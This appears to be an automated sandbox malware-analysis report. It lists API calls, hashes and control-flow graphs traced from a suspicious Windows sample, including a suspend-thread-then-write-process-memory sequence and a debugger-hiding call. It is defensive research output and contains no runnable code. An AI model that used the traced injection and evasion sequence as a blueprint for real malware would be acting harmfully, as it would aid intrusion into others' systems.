                                                                      • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 00D74B25
                                                                      • LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 00D74BAB
                                                                      • LocalFree.KERNEL32(00000000,862265DA,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 00D74C2D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                       • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmp
                                                                       • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 2012307162-0
                                                                      • Opcode ID: 00228d4a3f9bb1f1586903a11662ddd2612d6bf0d76ca4e4f41c0c689f4e47e7
                                                                      • Instruction ID: 6ac467dcf06480e0266a26173f5c18754e37818b9907af237573b44aa3fcda9f
                                                                      • Opcode Fuzzy Hash: 00228d4a3f9bb1f1586903a11662ddd2612d6bf0d76ca4e4f41c0c689f4e47e7
                                                                      • Instruction Fuzzy Hash: 4851C4726042159FC7159F28D841A6AB7E9EF89350F144A6EF45AD7390EB30DD048BB1

                                                                      Execution Graph

                                                                      Execution Coverage:1.5%
                                                                      Dynamic/Decrypted Code Coverage:1.1%
                                                                      Signature Coverage:1.1%
                                                                      Total number of Nodes:272
                                                                      Total number of Limit Nodes:26
                                                                      execution_graph 79090 b1a110 79091 b1a230 79090->79091 79093 b1a13e 79090->79093 79093->79091 79094 b1a304 79093->79094 79095 b1a32c 79094->79095 79098 b1a26c 79095->79098 79097 b1a337 79097->79091 79101 b199a4 79098->79101 79100 b1a28f 79100->79097 79102 b199aa 79101->79102 79105 b15af0 79102->79105 79104 b199bf 79104->79100 79106 b15afa 79105->79106 79109 b0cae4 79106->79109 79108 b15b10 79108->79104 79110 b0caf5 79109->79110 79112 b0cb79 79110->79112 79113 bad3ec 79110->79113 79112->79108 79116 bad1a8 79113->79116 79115 bad3f9 79115->79112 79117 bad323 79116->79117 79118 bad1d8 79116->79118 79117->79115 79118->79117 79119 bad260 RegOpenKeyExW 79118->79119 79119->79118 79120 bad273 79119->79120 79120->79115 79248 bc0c48 79249 bc0c50 79248->79249 79259 bc0cdb 79249->79259 79274 bc0b40 79249->79274 79252 bc0b40 CreateProcessW 79253 bc0c90 79252->79253 79254 bc0b40 CreateProcessW 79253->79254 79255 bc0c9c 79254->79255 79256 bc0b40 CreateProcessW 79255->79256 79257 bc0ca8 79256->79257 79258 bc0b40 CreateProcessW 79257->79258 79262 bc0cb4 79258->79262 79260 bb0354 2 API calls 79259->79260 79261 bc0d25 79259->79261 79270 bc0e9b 79259->79270 79260->79261 79264 bb0354 2 API calls 79261->79264 79265 bc0d6f 79261->79265 79278 bb0354 79262->79278 79264->79265 79266 bb0354 2 API calls 79265->79266 79271 bc0db9 79265->79271 79266->79271 79267 bc0b40 CreateProcessW 79268 bc0e81 79267->79268 79269 bb0354 2 API calls 79268->79269 79269->79270 79272 bb0354 2 API calls 79271->79272 79273 bc0e45 79271->79273 79272->79273 79273->79267 79273->79270 79275 bc0b5c 79274->79275 79276 bc0bd5 CreateProcessW 79275->79276 79277 bc0be1 79276->79277 79277->79252 79279 bb036e 79278->79279 79282 ba544c 79279->79282 79280 bb03cd 79280->79259 79283 ba5460 79282->79283 79289 ba4a24 79283->79289 79285 ba558f 79285->79280 79286 ba5486 79286->79285 79293 99e834 79286->79293 79287 ba5517 79287->79280 79290 ba4a2d 79289->79290 79291 
b0cae4 RegOpenKeyExW 79290->79291 79292 ba4a43 79291->79292 79292->79286 79294 99e84a 79293->79294 79297 99e7a8 79294->79297 79296 99e89a 79296->79287 79298 99e7c9 79297->79298 79302 99e80c 79297->79302 79299 99e7a8 KiUserCallbackDispatcher 79298->79299 79298->79302 79300 99e7e1 79299->79300 79303 99d0a0 79300->79303 79302->79296 79305 99d0b1 79303->79305 79304 99d11d 79304->79302 79305->79304 79308 9a54a4 79305->79308 79309 9a54c0 79308->79309 79312 9aad64 79309->79312 79311 99d0fc 79311->79302 79313 9aad9d 79312->79313 79316 b094b0 79313->79316 79314 9aaf5c 79314->79311 79317 b094ca KiUserCallbackDispatcher 79316->79317 79317->79314 79318 b5cee0 79319 b5cee9 79318->79319 79321 b5cef5 79318->79321 79322 b58164 79319->79322 79323 b5816e 79322->79323 79324 b581e4 79323->79324 79326 91af3c 79323->79326 79324->79321 79327 91af69 GetFileVersionInfoSizeW 79326->79327 79329 91af89 GetFileVersionInfoW 79327->79329 79330 91affc 79327->79330 79332 91afbc 79329->79332 79330->79324 79332->79324 79333 bf9748 79335 bf99fe 79333->79335 79336 bf9a22 79335->79336 79338 bf9a24 std::bad_alloc::bad_alloc 79335->79338 79343 bfc0b6 79335->79343 79353 bfc18f TlsGetValue TlsGetValue _raise 79335->79353 79341 bf9a4a 79338->79341 79354 bfc050 9 API calls __cinit 79338->79354 79355 bf99e1 7 API calls std::exception::exception 79341->79355 79342 bf9a54 FindHandler 79344 bfc169 79343->79344 79348 bfc0c8 _malloc 79343->79348 79360 bfc18f TlsGetValue TlsGetValue _raise 79344->79360 79346 bfc155 _raise 79346->79335 79348->79346 79351 bfc125 RtlAllocateHeap 79348->79351 79356 c0029d 4 API calls 2 library calls 79348->79356 79357 c000f2 4 API calls 6 library calls 79348->79357 79358 bfc067 7 API calls 3 library calls 79348->79358 79359 bfc18f TlsGetValue TlsGetValue _raise 79348->79359 79351->79348 79353->79335 79354->79341 79355->79342 79356->79348 79357->79348 79358->79348 79359->79348 79360->79346 79121 bca114 79122 bca127 79121->79122 79124 bca1b2 79121->79124 79123 bca1a8 GetNativeSystemInfo 
Execution Graph (rendered graph not recoverable; node/edge layout omitted, only nodes carrying API or library-call labels are retained):
• b5d288 GetFileVersionInfoSizeW GetFileVersionInfoW; b5d2a4 GetFileVersionInfoSizeW GetFileVersionInfoW
• ba7d45 KiUserCallbackDispatcher
• bfaa71 __DllMainCRTStartup@12; bfa83b ___DllMainCRTStartup (28 API calls)
• bfa97c _raise; bfaa19 _raise; bfaa89 _raise (7 API calls)
• bfe1b4 HeapCreate; bfe1e4 HeapFree HeapFree
• bfd9ff _doexit (7 API calls); bfdcb0 _realloc (7 API calls); bfd6af __calloc_impl (8 API calls)
• bfb615 TlsGetValue TlsGetValue TlsGetValue TlsSetValue _raise; bfb59a TlsGetValue TlsGetValue __init_pointers
• bfa861 __RTC_Initialize; bfdf76 ___initmbctable (16 API calls)
• bfb92f (10 API calls, 2 library calls); bfb649 (8 API calls, 2 library calls); bfe031 (7 API calls, 2 library calls); bfda5c (8 API calls, 3 library calls); bfb686 (7 API calls, 2 library calls); bfdcfe (16 API calls, 6 library calls); bfd838 (9 API calls, 5 library calls); bfb99d (10 API calls, 5 library calls)
• 8fc97c (6 API calls); 8fc860 (6 API calls)
• b19322 GlobalAddAtomW
• b1907f SetErrorMode; b190b2 SetErrorMode
• bae4a7 LoadIconW; bad032 LoadCursorW; bad66c SystemParametersInfoW
• 1dba895 NtSetInformationThread
• 1b3e928 NtQuerySystemInformation
• beb7e2 WriteProcessMemory

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 390 1dba7c0-1dba947 NtSetInformationThread
                                                                      APIs
                                                                      • NtSetInformationThread.NTDLL ref: 01DBA899
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2581599388.0000000001DBA000.00000020.00000001.01000000.00000007.sdmp, Offset: 01DBA000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1dba000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InformationThread
                                                                      • String ID: e
                                                                      • API String ID: 4046476035-4024072794
                                                                      • Opcode ID: e75d78890c758655ed10d432cdabdfd8fe236bd656487057f6c459c77efb4086
                                                                      • Instruction ID: 1c7e36c046886324a019c581e8f0908421e97bc1221d4aca2d1b8756a26412b3
                                                                      • Opcode Fuzzy Hash: e75d78890c758655ed10d432cdabdfd8fe236bd656487057f6c459c77efb4086
                                                                      • Instruction Fuzzy Hash: 22410B3251865A0BC31DEE28EC440E6B3C6F6C8329B58873DE9DBC3686E33490578BC1
                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL ref: 01B3E92C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2581599388.0000000001B3C000.00000020.00000001.01000000.00000007.sdmp, Offset: 01B3C000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1b3c000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      • Opcode ID: 1f3a8111c5d2d5b92133da034e7bb3420c2438cf33a869b2a462d3ffe8cf3b79
                                                                      • Instruction ID: e1747c2b93f761410ad8b9a48995a26d96c05f38b170a4cfc08710a0117596dd
                                                                      • Opcode Fuzzy Hash: 1f3a8111c5d2d5b92133da034e7bb3420c2438cf33a869b2a462d3ffe8cf3b79
                                                                      • Instruction Fuzzy Hash: 2ED05E76608224DFC704DE9DB4C04C9B3B1AB88350B604426E965DB224D7306E6A8780
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_8f1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab534339ebf2f26df59a6dabcf4891875b70cb508f85659e8086122488c55be5
                                                                      • Instruction ID: 8a478df58015df144de217e6e04deac4fc5e852b6df831b2e240d76c361782ad
                                                                      • Opcode Fuzzy Hash: ab534339ebf2f26df59a6dabcf4891875b70cb508f85659e8086122488c55be5
                                                                      • Instruction Fuzzy Hash: A5A01210408C000AC404A72C4C4380F35807D81210FC40214B55CE5682EA06856803D7

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GlobalAddAtomW.KERNEL32(00000000), ref: 00B19350
                                                                        • Part of subcall function 00B19070: SetErrorMode.KERNELBASE(00008000), ref: 00B19084
                                                                        • Part of subcall function 00B19070: SetErrorMode.KERNELBASE(?,00B190D0), ref: 00B190C3
                                                                        • Part of subcall function 00BAE394: LoadIconW.USER32(00BD4040,MAINICON,?,?,?,00B19410), ref: 00BAE4BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AtomGlobalIconLoad
                                                                      • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DelphiRM_GetObjectInstance$USER32
                                                                      • API String ID: 1953398334-1139167764
                                                                      • Opcode ID: 1c95ce4c36e97c6fcfdb48dcd49fe51db96fc80a9add1da6eed97a1b8032b9d3
                                                                      • Instruction ID: eb676cbad24aaa0b91f0ea24cc2153ef68e0799743882eefd44177d352ddbfe0
                                                                      • Opcode Fuzzy Hash: 1c95ce4c36e97c6fcfdb48dcd49fe51db96fc80a9add1da6eed97a1b8032b9d3
                                                                      • Instruction Fuzzy Hash: 0B4171746102459FCB00EFB8ECA2A9DB7E8FB55300B404475F514D73A2EF349A44CB61

                                                                      Control-flow Graph

                                                                      control_flow_graph 147 bfa83b-bfa848 148 bfa84a-bfa84b call bfe1b4 147->148 149 bfa8c6-bfa8ca 147->149 155 bfa850-bfa853 148->155 151 bfa8fd-bfa900 149->151 152 bfa8cc-bfa8d2 149->152 153 bfa95b-bfa95e 151->153 154 bfa902-bfa919 call bfb615 call bfd6af 151->154 156 bfa855-bfa857 152->156 157 bfa8d4-bfa8e0 152->157 160 bfa967-bfa969 153->160 161 bfa960-bfa966 call bfb92f 153->161 154->156 178 bfa91f-bfa936 call bfb59a 154->178 155->156 159 bfa85c-bfa863 call bfb99d 155->159 162 bfa96a-bfa96d 156->162 163 bfa8e7-bfa8ea 157->163 164 bfa8e2 call bfd9ff 157->164 175 bfa86c-bfa88d call bfe168 call bfe031 call bfda5c 159->175 176 bfa865-bfa86a call bfe1e4 159->176 160->162 161->160 163->160 169 bfa8ec-bfa8fb call bfdcb0 call bfb649 call bfe1e4 163->169 164->163 169->160 201 bfa88f-bfa894 call bfb649 175->201 202 bfa896-bfa89d call bfdf76 175->202 176->156 193 bfa94f-bfa956 call bfaa89 178->193 194 bfa938-bfa94d call bfb686 178->194 193->156 194->160 201->176 208 bfa8bf-bfa8c4 call bfdcb0 202->208 209 bfa89f-bfa8a6 call bfdcfe 202->209 208->201 209->208 214 bfa8a8-bfa8b2 call bfd838 209->214 214->208 217 bfa8b4-bfa8ba 214->217 217->160
                                                                      APIs
                                                                      • __mtterm.LIBCMT ref: 00BFA8F1
                                                                        • Part of subcall function 00BFE1B4: HeapCreate.KERNELBASE(00000000,00000000,00001000,00000000,?,00BFA850,?), ref: 00BFE1CA
                                                                      • __RTC_Initialize.LIBCMT ref: 00BFA86C
                                                                      • __mtterm.LIBCMT ref: 00BFA88F
                                                                        • Part of subcall function 00BFB649: TlsFree.KERNEL32(00C0C65C,00BFA8F6), ref: 00BFB674
                                                                      • __setenvp.LIBCMT ref: 00BFA89F
                                                                      • __cinit.LIBCMT ref: 00BFA8AA
                                                                      • __freeptd.LIBCMT ref: 00BFA961
                                                                        • Part of subcall function 00BFB615: TlsGetValue.KERNEL32(?,00BFB784), ref: 00BFB61E
                                                                        • Part of subcall function 00BFB615: TlsSetValue.KERNEL32(00000000), ref: 00BFB63F
                                                                        • Part of subcall function 00BFD6AF: __calloc_impl.LIBCMT ref: 00BFD6C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value__mtterm$CreateFreeHeapInitialize__calloc_impl__cinit__freeptd__setenvp
                                                                      • String ID:
                                                                      • API String ID: 1549949408-0
                                                                      • Opcode ID: fb9780ff681dc9f49ff86cfa4d65104bd820c53908668b574e8b6565fc10da02
                                                                      • Instruction ID: 884df2f9f6199fd1e90c80bf4ce280ef250f5749e889fec4d8c0049579634dd8
                                                                      • Opcode Fuzzy Hash: fb9780ff681dc9f49ff86cfa4d65104bd820c53908668b574e8b6565fc10da02
                                                                      • Instruction Fuzzy Hash: 5E21C3B150424D999A2D37B19C4273E33D9DE507A0B2185FAFB1CD3092EFA0C84E9563

                                                                      Control-flow Graph

                                                                      control_flow_graph 218 bf9748-bf9a06 220 bf9a15-bf9a18 call bfc0b6 218->220 222 bf9a1d-bf9a20 220->222 223 bf9a08-bf9a13 call bfc18f 222->223 224 bf9a22-bf9a23 222->224 223->220 227 bf9a24-bf9a30 223->227 228 bf9a4b-bf9a6f call bf99e1 call bfc1b7 227->228 229 bf9a32-bf9a4a call bf9994 call bfc050 227->229 238 bf9a78-bf9a7e 228->238 229->228 239 bf9a71-bf9a74 238->239 240 bf9a80-bf9a83 238->240 241 bf9a87-bf9a88 239->241 242 bf9a76-bf9a77 239->242 240->241 243 bf9a85 240->243 242->238 243->241
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00BF9A18
                                                                        • Part of subcall function 00BFC0B6: __FF_MSGBANNER.LIBCMT ref: 00BFC0D9
                                                                        • Part of subcall function 00BFC0B6: __NMSG_WRITE.LIBCMT ref: 00BFC0E0
                                                                        • Part of subcall function 00BFC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00BFC12D
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00BF9A3B
                                                                        • Part of subcall function 00BF9994: std::exception::exception.LIBCMT ref: 00BF99A0
                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 00BF9A4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                      • String ID: PU'
                                                                      • API String ID: 832318072-4254717615
                                                                      • Opcode ID: d8754849175cb0c8c04bd20d674257c9db1b8b7398be57d02fddf9b9a0aa5d64
                                                                      • Instruction ID: 3648112d81437b8c644b9c83ee2dc51648abf5ca7bd2a91fbe63d0fa4b4afe67
                                                                      • Opcode Fuzzy Hash: d8754849175cb0c8c04bd20d674257c9db1b8b7398be57d02fddf9b9a0aa5d64
                                                                      • Instruction Fuzzy Hash: 22014C3140420D6ACF34B765D802BBE3BD8CB80728B1480F5FA05975E2DE71DD8EC691

                                                                      Control-flow Graph

                                                                      control_flow_graph 244 bad1a8-bad1d2 245 bad1d8-bad206 244->245 246 bad334-bad352 244->246 251 bad20c-bad216 245->251 252 bad323-bad32d 245->252 253 bad219-bad225 call b19244 251->253 252->246 256 bad22b-bad26d RegOpenKeyExW 253->256 257 bad316-bad31d 253->257 256->257 259 bad273-bad2a7 256->259 257->252 257->253 261 bad2f8-bad30e 259->261 262 bad2a9-bad2e0 259->262 262->261 266 bad2e2-bad2ee 262->266 266->261
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000002,00000000), ref: 00BAD266
                                                                      Strings
                                                                      • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00BAD250
                                                                      • layout text, xrefs: 00BAD297
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                      • API String ID: 71445658-2652665750
                                                                      • Opcode ID: 1e904e6baa49bde0ca5e0c38124d7ac03643cc4edf114ff24013146a2408addd
                                                                      • Instruction ID: 49f2b7b088fac2598c3a4c1a948244a5982aef24147e978703b2f46d72a5fa7d
                                                                      • Opcode Fuzzy Hash: 1e904e6baa49bde0ca5e0c38124d7ac03643cc4edf114ff24013146a2408addd
                                                                      • Instruction Fuzzy Hash: 73412874A04208AFDB11DF98C982BADB7F9FB4A300F5040E5EA05E7651E770AF44CB66

                                                                      Control-flow Graph

                                                                      control_flow_graph 267 b19070-b1907d 268 b190d0-b190d2 267->268 269 b1907f-b190a1 SetErrorMode 267->269 270 b190a3-b190ad 269->270 271 b190b2-b190c8 SetErrorMode 269->271 270->271
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008000), ref: 00B19084
                                                                      • SetErrorMode.KERNELBASE(?,00B190D0), ref: 00B190C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID: imm32.dll
                                                                      • API String ID: 2340568224-1815517138
                                                                      • Opcode ID: f8df4e2d89f544a77f160caf0bb080919012a3fb0f62eea1a2ae0f2a74ade47c
                                                                      • Instruction ID: 816a1f0bcc38b5fe124907dc713d354a62ea22c1b5ef718e55cc8bac2181f8fc
                                                                      • Opcode Fuzzy Hash: f8df4e2d89f544a77f160caf0bb080919012a3fb0f62eea1a2ae0f2a74ade47c
                                                                      • Instruction Fuzzy Hash: F3F0E271608744AFD711DB68AC36B65B7ECD348B10FD2C4E6F008D39E0EA759980CA20

                                                                      Control-flow Graph

                                                                      control_flow_graph 348 bae394-bae3a1 349 bae3ab-bae3c1 348->349 350 bae3a3 348->350 352 bae3d8-bae3e2 349->352 353 bae3c3-bae3d2 349->353 350->349 354 bae3f2-bae3fc 352->354 355 bae3e4-bae3ec 352->355 353->352 357 bae3fe-bae406 354->357 358 bae40c-bae516 call aea890 call af3ea0 LoadIconW call af4338 354->358 355->354 357->358 370 bae518-bae51b 358->370 371 bae526-bae537 358->371 370->371 373 bae539 371->373 374 bae53e-bae56c call ba3c28 371->374 373->374 379 bae571-bae586 374->379 380 bae588-bae58a call bae7d8 379->380 381 bae58f-bae5db call bb1304 call bb1f70 379->381 380->381 387 bae5ec-bae5f3 381->387 388 bae5dd-bae5e9 381->388 388->387
                                                                      APIs
                                                                      • LoadIconW.USER32(00BD4040,MAINICON,?,?,?,00B19410), ref: 00BAE4BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: MAINICON
                                                                      • API String ID: 2457776203-2283262055
                                                                      • Opcode ID: 6b7a2074d793824c5334a84bf81de091391bf24dc4a4f86d8c4c0ec8d5010782
                                                                      • Instruction ID: 2524b4a6ddd932bf2146fc068aed1bf61bda67de64a1989dbd01c35ad8abf018
                                                                      • Opcode Fuzzy Hash: 6b7a2074d793824c5334a84bf81de091391bf24dc4a4f86d8c4c0ec8d5010782
                                                                      • Instruction Fuzzy Hash: E4612B70A042848FDB01EF38D885B957BE5AB15304F4884F9E808CF357DBB59948CB61

                                                                      Control-flow Graph

                                                                      control_flow_graph 392 bc0b40-bc0bdf call bb0d5c CreateProcessW 399 bc0be1-bc0bed 392->399 400 bc0bf3-bc0c15 392->400 399->400
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(00000000,00000000), ref: 00BC0BD8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: D
                                                                      • API String ID: 963392458-2746444292
                                                                      • Opcode ID: 4d129efe1de52e25c021b078a40997a984f7ec8fc09012162e748cffea817208
                                                                      • Instruction ID: 659a9e03fea98522073b32529a860c553242b7087e3d9cc3ac484c65a7cf7499
                                                                      • Opcode Fuzzy Hash: 4d129efe1de52e25c021b078a40997a984f7ec8fc09012162e748cffea817208
                                                                      • Instruction Fuzzy Hash: 7B214D70A1420CAFDB04EBE8C852BEEB7FDFB49700F404069F614E7291DB74AA048B55

                                                                      Control-flow Graph

                                                                      control_flow_graph 404 91af3c-91af87 GetFileVersionInfoSizeW 408 91af89-91afba GetFileVersionInfoW 404->408 409 91affc-91b011 404->409 413 91afbc-91afd4 408->413 414 91afdf-91aff4 408->414 413->414 417 91afd6-91afdc 413->417 417->414
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 0091AF7E
                                                                      • GetFileVersionInfoW.KERNELBASE(00000000), ref: 0091AFB3
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.000000000090B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0090B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_90b000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$Size
                                                                      • String ID:
                                                                      • API String ID: 2104008232-0
                                                                      • Opcode ID: 9025fdb617e3be68b2b7e1b7475ed71cc066d4922fcdfae73c8a665c1ecf6868
                                                                      • Instruction ID: fb878bab0baaefd6573d80c1c4d3e864ee8750e931245e6ab9a4d02e05b557ce
                                                                      • Opcode Fuzzy Hash: 9025fdb617e3be68b2b7e1b7475ed71cc066d4922fcdfae73c8a665c1ecf6868
                                                                      • Instruction Fuzzy Hash: 1D213DB1B0060DAFDB15DFB8CC829AEB7FCEB89310B514471B610E3691EB34DE419622

                                                                      Control-flow Graph

                                                                      control_flow_graph 418 beb7a5-beb7d9 Wow64SuspendThread 420 beb7db 418->420 421 beb805-beb80b 418->421 422 beb7dd-beb7e0 420->422 423 beb7e2-beb804 WriteProcessMemory 420->423 422->421 422->423
                                                                      APIs
                                                                      • Wow64SuspendThread.KERNEL32 ref: 00BEB7A5
                                                                      • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00BEB7F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BEB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BEB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_beb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessSuspendThreadWow64Write
                                                                      • String ID:

                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2544611345.0000000000CFC000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CFC000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_cfc000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: P$t

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,00BA7DC8), ref: 00BA7D46
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      APIs
                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00BCA1AD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000BCA000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BCA000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bca000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InfoNativeSystem
                                                                      • String ID:
                                                                      APIs
                                                                      • SystemParametersInfoW.USER32(00000029,00000000,?,00000000,?,00000000,00B9F730,?,00BACC47,00000000,00000000,00BA783C,6E6F4646,?,?,00000000), ref: 00BAD681
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem
                                                                      • String ID:
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00BEB7F5
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BEB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BEB000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_beb000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00000000,?,?,?,00B9F730,00BACB5F,?,?,00000000,?,00B193F0), ref: 00BAD036
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CursorLoad
                                                                      • String ID:
                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00B094EB
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00000000,00001000,00000000,?,00BFA850,?), ref: 00BFE1CA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
